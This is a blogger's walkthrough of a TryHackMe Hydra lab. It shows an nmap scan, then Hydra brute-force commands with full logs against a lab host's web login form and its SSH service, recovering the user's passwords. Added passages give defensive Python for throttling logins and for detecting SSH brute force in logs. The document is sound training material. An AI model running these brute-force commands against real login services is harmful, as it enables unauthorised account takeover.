THM — HYDRA

Yikai
Nov 24, 2020

Nmap

kali@kali:~$ sudo nmap -T4 -A 10.10.88.51
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-24 05:26 EST
Nmap scan report for 10.10.88.51
Host is up (0.35s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1d:8f:d6:43:74:50:e4:6f:cb:bc:6c:f8:75:ff:9e:c9 (RSA)
| 256 bc:82:77:00:d3:1f:69:c5:e5:22:c5:f1:2a:53:b5:41 (ECDSA)
|_ 256 aa:77:05:57:bd:63:82:fc:77:8e:fa:e3:97:d9:d5:16 (ED25519)
80/tcp open http Node.js Express framework
| http-title: Hydra Challenge
|_Requested resource was /login
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/24%OT=22%CT=1%CU=39163%PV=Y%DS=4%DC=T%G=Y%TM=5FBCE0
OS:13%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)SE
OS:Q(SP=101%GCD=1%ISR=10C%TI=Z%II=I%TS=8)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I
OS:%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O
OS:5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6
OS:=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 99.73 ms 10.4.0.1
2 ... 3
4 412.71 ms 10.10.88.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.53 seconds

Using the Hydra command:

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.88.51 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V -f
  • -l sets a single username; to try a list of usernames instead, use -L with the path to the list.
  • -P sets the password list; give it the path to the wordlist.
  • http-post-form is the Hydra module for login forms that are submitted with an HTTP POST.
  • "/login: the text between the opening double quote and the first colon is the path of the login page you are attacking.
  • username=^USER^ username is the form field, and ^USER^ is where Hydra substitutes the username given (or each entry of the username list).
  • password=^PASS^ password is the form field, and ^PASS^ is where Hydra substitutes each entry of the password list (or the single password given).
  • F=incorrect the part after the second colon is the failure condition: a response containing "incorrect" is counted as a failed login.
  • -V is for verbosity; it lists each login attempt together with the password tried.
  • -f makes Hydra stop after the first valid username:password pair.
  • -t <integer> is optional and tells Hydra how many tasks to run in parallel. By default, Hydra runs 16 tasks.

For a detailed explanation of using Hydra to attack web forms, see: https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/

Results:

kali@kali:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.88.51 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-24 05:45:04
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.88.51:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "654321" - 17 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "michael" - 18 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "ashley" - 19 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "qwerty" - 20 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "111111" - 21 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "iloveu" - 22 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "000000" - 23 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "michelle" - 24 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "tigger" - 25 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "sunshine" - 26 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "chocolate" - 27 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "password1" - 28 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "soccer" - 29 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "anthony" - 30 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "friends" - 31 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "butterfly" - 32 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "purple" - 33 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "angel" - 34 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "jordan" - 35 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "liverpool" - 36 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "justin" - 37 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "loveme" - 38 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "fuckyou" - 39 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "123123" - 40 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "football" - 41 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "secret" - 42 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "andrea" - 43 of 14344399 [child 11] (0/0)
[80][http-post-form] host: 10.10.88.51 login: molly password: sunshine
[STATUS] attack finished for 10.10.88.51 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-24 05:45:25

Log in and get the flag.
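The run above succeeded because /login accepted unlimited guesses, with the valid password turning up as guess 26. As an added example (not part of the original write-up or the challenge's code), here is the server-side control that stops it: a sliding-window cap on failed logins per account and per source IP. The class and function names, the 10.4.0.99 source address and the 5-failures-per-15-minutes policy are assumptions.

```python
from collections import defaultdict, deque


class LoginThrottle:
    """Sliding-window cap on failed logins, tracked per account and per source IP."""

    def __init__(self, max_failures=5, window_s=900):
        self.max_failures = max_failures
        self.window_s = window_s
        self.failures = defaultdict(deque)  # key -> timestamps of recent failures

    def _blocked(self, key, now):
        q = self.failures[key]
        while q and now - q[0] >= self.window_s:
            q.popleft()  # forget failures that have aged out of the window
        return len(q) >= self.max_failures

    def attempt(self, user, ip, password, now, check):
        """Return 'blocked', 'ok' or 'incorrect' for one login attempt."""
        keys = (("user", user), ("ip", ip))
        if any(self._blocked(k, now) for k in keys):
            return "blocked"  # the submitted password is never evaluated
        if check(user, password):
            return "ok"
        for k in keys:
            self.failures[k].append(now)
        return "incorrect"


def check_password(user, password):
    # Stand-in for the credential store; the pair is the one found on this page.
    return (user, password) == ("molly", "sunshine")


# Constructed replay: 25 wrong guesses, then the valid password as guess 26
# (its position in the Hydra output above), 50 ms apart from one address.
GUESSES = [f"wrong-{i}" for i in range(25)] + ["sunshine"]


def replay(throttle, guesses, ip="10.4.0.99", step_s=0.05):
    return [throttle.attempt("molly", ip, g, i * step_s, check_password)
            for i, g in enumerate(guesses)]


def summarize(results):
    return {r: results.count(r) for r in ("incorrect", "blocked", "ok")}


if __name__ == "__main__":
    print("5 failures / 15 min:", summarize(replay(LoginThrottle(), GUESSES)))
    print("no effective limit: ", summarize(replay(LoginThrottle(10**9), GUESSES)))
```

Keying on the account also lets anyone lock molly out by failing on purpose, so a hard per-account block is usually paired with per-IP limits, growing delays or a second factor.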

Now let’s attack Molly’s SSH login.

hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.88.51 -V -f

Results:

kali@kali:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.88.51 -V -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-24 05:56:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.88.51:22/
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "654321" - 17 of 14344401 [child 11] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "michael" - 18 of 14344401 [child 14] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "ashley" - 19 of 14344401 [child 0] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "qwerty" - 20 of 14344401 [child 1] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "111111" - 21 of 14344401 [child 2] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "iloveu" - 22 of 14344401 [child 3] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "000000" - 23 of 14344401 [child 4] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "michelle" - 24 of 14344401 [child 5] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "tigger" - 25 of 14344401 [child 6] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "sunshine" - 26 of 14344401 [child 7] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "chocolate" - 27 of 14344401 [child 8] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "password1" - 28 of 14344401 [child 9] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "soccer" - 29 of 14344401 [child 10] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "anthony" - 30 of 14344401 [child 12] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "friends" - 31 of 14344401 [child 13] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "butterfly" - 32 of 14344401 [child 15] (0/2)
[22][ssh] host: 10.10.88.51 login: molly password: butterfly
[STATUS] attack finished for 10.10.88.51 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-24 05:56:44

To connect through SSH, use the following command:

ssh molly@10.10.88.51

Once connected, you will find flag2.txt, which contains the flag, in your current working directory.
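On the target, the SSH run above leaves a distinctive trace in the sshd log: a burst of failed passwords from one address followed by an accepted one. The following added example (not from the original write-up) detects that sequence; the log lines are constructed, and the hostname, PIDs, ports, source addresses, the threshold of 10 failures and the 60-second window are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log lines in OpenSSH's usual syslog format. Hostname, PIDs,
# ports and source addresses are made up; the 31 failures before the accepted
# login mirror the Hydra SSH run above (valid password on attempt 32).
SAMPLE = [
    f"Nov 24 05:56:{33 + i // 4:02d} hydra sshd[{900 + i}]: Failed password "
    f"for molly from 10.4.0.99 port {40000 + i} ssh2"
    for i in range(31)
] + [
    "Nov 24 05:56:43 hydra sshd[931]: Accepted password for molly from 10.4.0.99 port 40031 ssh2",
    "Nov 24 06:10:02 hydra sshd[990]: Failed password for molly from 10.4.0.7 port 51000 ssh2",
    "Nov 24 06:10:09 hydra sshd[991]: Accepted password for molly from 10.4.0.7 port 51001 ssh2",
]

LINE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def detect(lines, threshold=10, window_s=60, year=2020):
    """Return (ip, user, failures) for each login accepted right after a failure burst."""
    recent = defaultdict(list)  # source ip -> timestamps of recent failures
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a password-auth result line
        # Syslog timestamps carry no year, so one is assumed.
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        outcome, user, ip = m.group(2), m.group(3), m.group(4)
        recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_s]
        if outcome == "Failed":
            recent[ip].append(ts)
        elif len(recent[ip]) >= threshold:
            alerts.append((ip, user, len(recent[ip])))
    return alerts


if __name__ == "__main__":
    for ip, user, n in detect(SAMPLE):
        print(f"ALERT {ip}: login as {user} accepted after {n} failures within 60 s")
```

The second source in the sample, one mistyped password followed by a success, stays below the threshold and raises no alert.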

Yikai

Started my journey in cybersecurity in September 2020. This blog is used mainly to record my learning journey.